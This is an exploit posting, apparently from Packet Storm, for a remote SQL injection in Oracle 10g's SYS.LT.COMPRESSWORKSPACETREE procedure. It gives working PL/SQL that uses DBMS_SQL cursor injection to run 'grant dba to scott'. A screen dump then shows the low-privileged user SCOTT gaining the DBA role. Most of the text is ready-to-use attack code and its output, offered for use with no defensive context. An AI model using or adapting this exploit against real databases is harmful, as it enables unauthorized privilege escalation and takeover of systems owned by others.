Oracle 10g SYS.LT.COMPRESSWORKSPACETREE remote SQL injection exploit.
55757f2be2c9a343c681161b90d6a7feThis is slightly modified version of: http://milw0rm.com/exploits/7677
This is based on cursor injection and does not need create function privileges:
DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;
#-----------screen dump---------------------------------------------------#
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO
SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme
diate ''grant dba to scott'';commit;end;',0);
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
8 end;
9
10
11 /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO
Sid
www.notsosecure.com
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!